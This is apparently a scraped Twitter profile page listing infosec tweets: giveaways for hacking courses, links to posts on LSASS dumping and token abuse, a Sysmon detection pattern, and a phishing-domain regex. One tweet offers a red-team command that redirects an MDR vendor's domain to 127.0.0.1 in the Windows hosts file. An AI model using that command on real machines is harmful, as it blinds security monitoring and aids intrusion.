Y (@yongseng_g) 's Twitter Profile

ID: 791666100

30-08-2012 14:05:56

711 Tweets

157 Followers

2.2K Following

Samir (@sbousseaden)

Sysmon 10 with CallTrace contains seclogon (abused svc via fake client pid) + GAccess eq 14C0 & target is lsass is highly likely an indicator of lsass handle obtention using malseclogon:

PROCESS_CREATE_PROCESS
PROCESS_DUP_HANDLE
PROCESS_QUERY_INFORMATION

x.com/splinter_code/…
RJ (@z3ro_c00l)

Stealth trick for Red Teaming - why worry about being caught by an MDR (i.e., Arctic Wolf, FireEye, etc.) when you can kill their visibility? 🧐 ipconfig /displaydns - Find API Endpoint echo 127.0.0.1 blahblah.fireye.com >> c:\windows\system32\drivers\etc\hosts

Logarithmic Rex (@logarithmicrex)

(1/25) Cryptography Fundamentals: Elliptic Curve Cryptography Elliptic Curve Cryptography is (one of) our strongest cryptographic tools, vastly more secure than its predecessors. But... how does the moon math at the center of modern crypto work? A layman's guide to Sci-Fi tech

Luke Stephens (hakluke) (@hakluke)

Okay here's the deal. I'm giving away 100 TCM Security training courses. 50 of them are the Practical Ethical Hacking course, and the other 50 are Practical Malware Analysis & Triage. To enter: 1. Retweet this tweet 2. Follow Luke Stephens (hakluke), haksec.io and HackerContent Good luck!

Orange Cyberdefense's SensePost Team (@sensepost)

Read @defte_'s Windows authentication token manipulation deep dive to compromise Active Directory in this new blog post. Includes a new tool and a CrackMapExec module using it as a, "token" of appreciation. sensepost.com/blog/2022/abus…

Rob Simon (@_kc57)

🎁 Monthly Giveaway🎁 Here are the prizes: • 1x 1-Month VIP+ Subscription Hack The Box • 3x 1-Month Subscriptions TryHackMe To participate: 👉 Like 👉 Retweet 👉 Follow Rob Simon Winners announced 11/18 Hack The Box #hackthebox #tryhackme #infosec #giveaway

Mor Davidovich (@dec0ne)

Happy to share a new blog post I wrote about how I managed to dump LSASS undetected using a simple MiniDumpWriteDump against some of the most advanced EDRs in the market. "It’s all in the details: The curious case of an LSASS dumper gone undetected" dec0ne.github.io/research/2022-…

THREAT CON (@threat_con)

We're giving away an OSCP voucher to our community.🎉 To participate : 1. Follow us on Twitter. 2. Retweet this post. 3. Like this tweet. It's that simple! By completing these steps, you'll be eligible to win. Also, register now at threatcon.io/pricing. #offsec #giveaway

sydney (@letswastetime)

Check out my first Splunk blog post! It covers key deliverables for #threathunting using the #PEAK Threat Hunting framework. I want to give a big shout out to David J. Bianco and the #SURGe crew for all the support! splunk.com/en_us/blog/sec…

Velociraptor (@velocidex)

Now available: "Uncovering Endpoint Compromise in Ransomware Attacks: Using Velociraptor to Investigate, Monitor, and Remediate Threat Activity." Learn how to use open-source software like Velociraptor to flexibly respond to a ransomware attack. ultimatewindowssecurity.com/webinars/regis…

Jane (@jane_0sint)

#Phishing 🔖Regular expression to identify suspicious domain names regex101.com/r/sdeeTK/1 app.any.run/tasks/acc86ff5…

Clint Gibler (@clintgibler)

🧰 CVE PoCs A repo with almost every publicly available CVE proof of concept (PoC) By Trickest #cybersecurity #bugbountytips github.com/trickest/cve

Mikhail Klyuchnikov (@m1ke_n1)

I've developed a website that aggregates infosec blog posts, h1 activity, and info about fresh CVEs. You can suggest a useful RSS feed and I'll add it. Check it 👇 websecnews.github.io